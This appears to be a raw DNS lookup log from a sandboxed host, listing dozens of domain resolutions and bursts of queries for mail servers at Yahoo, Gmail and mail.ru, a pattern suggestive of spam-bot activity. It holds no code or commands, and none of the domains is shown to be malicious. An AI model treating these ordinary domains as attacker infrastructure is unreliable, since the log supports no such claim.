                                                                                                                                                                              Sep 15, 2023 07:26:51.718697071 CEST8.8.8.8192.168.2.30x8428No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:52.408003092 CEST8.8.8.8192.168.2.30xb491No error (0)www.rs-ag.com172.67.152.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:52.408003092 CEST8.8.8.8192.168.2.30xb491No error (0)www.rs-ag.com104.21.1.213A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:52.670469046 CEST8.8.8.8192.168.2.30x21faNo error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:52.670469046 CEST8.8.8.8192.168.2.30x21faNo error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:53.253035069 CEST8.8.8.8192.168.2.30xc2b5Server failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:53.289660931 CEST8.8.8.8192.168.2.30xc2b5No error (0)www.koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:53.446408033 CEST8.8.8.8192.168.2.30xfaccNo error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:54.416613102 CEST8.8.8.8192.168.2.30x49a3No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:54.416613102 CEST8.8.8.8192.168.2.30x49a3No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:54.776120901 CEST8.8.8.8192.168.2.30xcb24No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:55.347753048 CEST8.8.8.8192.168.2.30xf536Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:55.540493965 CEST8.8.8.8192.168.2.30x6fc3No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:56.061247110 CEST8.8.8.8192.168.2.30xb52fName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:56.328252077 CEST8.8.8.8192.168.2.30x38c1No error (0)www.cokocoko.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:56.328252077 CEST8.8.8.8192.168.2.30x38c1No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:56.328252077 CEST8.8.8.8192.168.2.30x38c1No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:56.328252077 CEST8.8.8.8192.168.2.30x38c1No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:56.767297029 CEST8.8.8.8192.168.2.30xcb24No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:57.043179035 CEST8.8.8.8192.168.2.30xd680No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:57.542300940 CEST8.8.8.8192.168.2.30xb198No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:57.542300940 CEST8.8.8.8192.168.2.30xb198No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:57.748214006 CEST8.8.8.8192.168.2.30xcb24Server failure (2)www.vazir.senonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.030298948 CEST8.8.8.8192.168.2.30xd06fNo error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.134322882 CEST8.8.8.8192.168.2.30x6295No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.348998070 CEST8.8.8.8192.168.2.30xf3d4Name error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.574982882 CEST8.8.8.8192.168.2.30xfa1aNo error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.574982882 CEST8.8.8.8192.168.2.30xfa1aNo error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.574982882 CEST8.8.8.8192.168.2.30xfa1aNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.719883919 CEST8.8.8.8192.168.2.30x38a0Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.733167887 CEST8.8.8.8192.168.2.30x38a0Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.980663061 CEST8.8.8.8192.168.2.30x372No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:58.980663061 CEST8.8.8.8192.168.2.30x372No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:01.648395061 CEST8.8.8.8192.168.2.30x2a26No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:04.832683086 CEST8.8.8.8192.168.2.30xd2c5No error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:04.832683086 CEST8.8.8.8192.168.2.30xd2c5No error (0)smtp.mail.global.gm0.yahoodns.net66.218.88.167A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:04.832683086 CEST8.8.8.8192.168.2.30xd2c5No error (0)smtp.mail.global.gm0.yahoodns.net67.195.12.42A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:04.832683086 CEST8.8.8.8192.168.2.30xd2c5No error (0)smtp.mail.global.gm0.yahoodns.net66.163.170.52A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:06.994956017 CEST8.8.8.8192.168.2.30xed1eNo error (0)www.fnsds.orgexpired.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:06.994956017 CEST8.8.8.8192.168.2.30xed1eNo error (0)expired.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:06.994956017 CEST8.8.8.8192.168.2.30xed1eNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.235.172.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:06.994956017 CEST8.8.8.8192.168.2.30xed1eNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.211.34.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:07.376425028 CEST8.8.8.8192.168.2.30x190No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:07.376425028 CEST8.8.8.8192.168.2.30x190No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:08.681375027 CEST8.8.8.8192.168.2.30xdf48No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:09.458869934 CEST8.8.8.8192.168.2.30xc4c5No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:09.458869934 CEST8.8.8.8192.168.2.30xc4c5No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:10.146882057 CEST8.8.8.8192.168.2.30xe6a6No error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:10.146882057 CEST8.8.8.8192.168.2.30xe6a6No error (0)smtp.mail.global.gm0.yahoodns.net66.218.88.167A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:10.146882057 CEST8.8.8.8192.168.2.30xe6a6No error (0)smtp.mail.global.gm0.yahoodns.net66.163.170.52A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:10.146882057 CEST8.8.8.8192.168.2.30xe6a6No error (0)smtp.mail.global.gm0.yahoodns.net67.195.12.42A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:10.419298887 CEST8.8.8.8192.168.2.30xf974No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:11.342505932 CEST8.8.8.8192.168.2.30x5baNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:11.342505932 CEST8.8.8.8192.168.2.30x5baNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:12.330097914 CEST8.8.8.8192.168.2.30x7424Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:13.236154079 CEST8.8.8.8192.168.2.30x3688Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:13.236830950 CEST8.8.8.8192.168.2.30xac9dNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:13.236830950 CEST8.8.8.8192.168.2.30xac9dNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:14.774547100 CEST8.8.8.8192.168.2.30xdff8Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:15.294115067 CEST8.8.8.8192.168.2.30x8bf7Name error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:15.338783026 CEST8.8.8.8192.168.2.30x8be8No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:15.450114012 CEST8.8.8.8192.168.2.30xfd2No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:17.291948080 CEST8.8.8.8192.168.2.30xdeb7No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:17.291948080 CEST8.8.8.8192.168.2.30xdeb7No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:18.882034063 CEST8.8.8.8192.168.2.30xc9acNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:18.961930037 CEST8.8.8.8192.168.2.30xc1a1No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:18.961930037 CEST8.8.8.8192.168.2.30xc1a1No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.322998047 CEST8.8.8.8192.168.2.30x954eNo error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.322998047 CEST8.8.8.8192.168.2.30x954eNo error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.324925900 CEST8.8.8.8192.168.2.30x1c8No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.333420038 CEST8.8.8.8192.168.2.30x3412No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.373331070 CEST8.8.8.8192.168.2.30x2bcdNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.407102108 CEST8.8.8.8192.168.2.30xdb9fName error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.414143085 CEST8.8.8.8192.168.2.30xd95eNo error (0)rkengg.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.414143085 CEST8.8.8.8192.168.2.30xd95eNo error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.414143085 CEST8.8.8.8192.168.2.30xd95eNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.414143085 CEST8.8.8.8192.168.2.30xd95eNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.420218945 CEST8.8.8.8192.168.2.30x4f51No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.420218945 CEST8.8.8.8192.168.2.30x4f51No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.423866987 CEST8.8.8.8192.168.2.30x4d92No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.428039074 CEST8.8.8.8192.168.2.30xa673No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.428824902 CEST8.8.8.8192.168.2.30x65acNo error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.429718018 CEST8.8.8.8192.168.2.30x4324No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.429718018 CEST8.8.8.8192.168.2.30x4324No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.429718018 CEST8.8.8.8192.168.2.30x4324No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.435502052 CEST8.8.8.8192.168.2.30xcc38No error (0)envogen.com172.67.163.101A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.435502052 CEST8.8.8.8192.168.2.30xcc38No error (0)envogen.com104.21.73.149A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.437283039 CEST8.8.8.8192.168.2.30x17f8No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.437283039 CEST8.8.8.8192.168.2.30x17f8No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.437283039 CEST8.8.8.8192.168.2.30x17f8No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.438946962 CEST8.8.8.8192.168.2.30x6488No error (0)dspears.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.438946962 CEST8.8.8.8192.168.2.30x6488No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.438946962 CEST8.8.8.8192.168.2.30x6488No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.438946962 CEST8.8.8.8192.168.2.30x6488No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.445518017 CEST8.8.8.8192.168.2.30x8921No error (0)aiolos-sa.gr104.21.26.121A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.445518017 CEST8.8.8.8192.168.2.30x8921No error (0)aiolos-sa.gr172.67.168.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.451966047 CEST8.8.8.8192.168.2.30xca6fNo error (0)alt4.gmail-smtp-in.l.google.com142.250.153.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.462287903 CEST8.8.8.8192.168.2.30x1d5dNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.476586103 CEST8.8.8.8192.168.2.30xeff2No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.486813068 CEST8.8.8.8192.168.2.30x2515No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.498183966 CEST8.8.8.8192.168.2.30xbd01No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.508507967 CEST8.8.8.8192.168.2.30xeb6eNo error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.509638071 CEST8.8.8.8192.168.2.30x53dcNo error (0)shittas.com192.3.246.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.521055937 CEST8.8.8.8192.168.2.30xafe7No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.523281097 CEST8.8.8.8192.168.2.30x1f37No error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.552287102 CEST8.8.8.8192.168.2.30xd8f9No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.564526081 CEST8.8.8.8192.168.2.30xfe0eNo error (0)gmail-smtp-in.l.google.com172.253.63.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.569050074 CEST8.8.8.8192.168.2.30xa31cNo error (0)oozkranj.com212.44.102.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.592210054 CEST8.8.8.8192.168.2.30x3d5eNo error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.611723900 CEST8.8.8.8192.168.2.30xed13No error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.637947083 CEST8.8.8.8192.168.2.30xf1f1No error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.637947083 CEST8.8.8.8192.168.2.30xf1f1No error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.638154984 CEST8.8.8.8192.168.2.30x177aNo error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.638154984 CEST8.8.8.8192.168.2.30x177aNo error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.638154984 CEST8.8.8.8192.168.2.30x177aNo error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.638154984 CEST8.8.8.8192.168.2.30x177aNo error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.639919043 CEST8.8.8.8192.168.2.30xe657No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.644507885 CEST8.8.8.8192.168.2.30x8e79No error (0)wvs-net.de172.67.181.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.644507885 CEST8.8.8.8192.168.2.30x8e79No error (0)wvs-net.de104.21.43.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.667607069 CEST8.8.8.8192.168.2.30x918fNo error (0)in1.smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.667607069 CEST8.8.8.8192.168.2.30x918fNo error (0)in1.smtp.messagingengine.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.667607069 CEST8.8.8.8192.168.2.30x918fNo error (0)in1.smtp.messagingengine.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.667607069 CEST8.8.8.8192.168.2.30x918fNo error (0)in1.smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.667607069 CEST8.8.8.8192.168.2.30x918fNo error (0)in1.smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.667607069 CEST8.8.8.8192.168.2.30x918fNo error (0)in1.smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.671123028 CEST8.8.8.8192.168.2.30x780cNo error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.693439007 CEST8.8.8.8192.168.2.30x11aNo error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.742553949 CEST8.8.8.8192.168.2.30x8a6aNo error (0)kallman.net0.0.0.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.750401974 CEST8.8.8.8192.168.2.30x145eNo error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.755601883 CEST8.8.8.8192.168.2.30xb2baNo error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.755601883 CEST8.8.8.8192.168.2.30xb2baNo error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.755748034 CEST8.8.8.8192.168.2.30xb873No error (0)ramkome.com145.239.5.159A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.763787985 CEST8.8.8.8192.168.2.30x118aNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.791332960 CEST8.8.8.8192.168.2.30xd15Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.827033997 CEST8.8.8.8192.168.2.30x1147No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.838170052 CEST8.8.8.8192.168.2.30xa8faNo error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.838386059 CEST8.8.8.8192.168.2.30x8d0eNo error (0)shesfit.com172.67.158.251A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.838386059 CEST8.8.8.8192.168.2.30x8d0eNo error (0)shesfit.com104.21.74.141A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.839905977 CEST8.8.8.8192.168.2.30x8dc4No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.842999935 CEST8.8.8.8192.168.2.30xa9b4No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.843441010 CEST8.8.8.8192.168.2.30x87e2Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.844944954 CEST8.8.8.8192.168.2.30x3ba9No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.846380949 CEST8.8.8.8192.168.2.30x8fdaNo error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.849416018 CEST8.8.8.8192.168.2.30xd284No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.852128983 CEST8.8.8.8192.168.2.30x7b39No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.852128983 CEST8.8.8.8192.168.2.30x7b39No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.852128983 CEST8.8.8.8192.168.2.30x7b39No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.852128983 CEST8.8.8.8192.168.2.30x7b39No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.859755039 CEST8.8.8.8192.168.2.30x5574No error (0)alt4.gmail-smtp-in.l.google.com142.250.153.26A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.870196104 CEST8.8.8.8192.168.2.30x7795No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.870196104 CEST8.8.8.8192.168.2.30x7795No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.873692036 CEST8.8.8.8192.168.2.30xcfafNo error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.926152945 CEST8.8.8.8192.168.2.30xa094No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.926152945 CEST8.8.8.8192.168.2.30xa094No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.927165031 CEST8.8.8.8192.168.2.30x4832No error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.940531969 CEST8.8.8.8192.168.2.30x432eNo error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.943300009 CEST8.8.8.8192.168.2.30xde53No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.947422981 CEST8.8.8.8192.168.2.30xfaaeNo error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.951339960 CEST8.8.8.8192.168.2.30x2dedNo error (0)revoldia.net154.201.225.123A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.962013960 CEST8.8.8.8192.168.2.30xa0cdNo error (0)gmail-smtp-in.l.google.com172.253.63.27A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.962469101 CEST8.8.8.8192.168.2.30xe819Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.965543985 CEST8.8.8.8192.168.2.30x4adServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.975342989 CEST8.8.8.8192.168.2.30x8b63No error (0)alt4.gmail-smtp-in.l.google.com142.250.153.26A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:21.985914946 CEST8.8.8.8192.168.2.30x3121Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
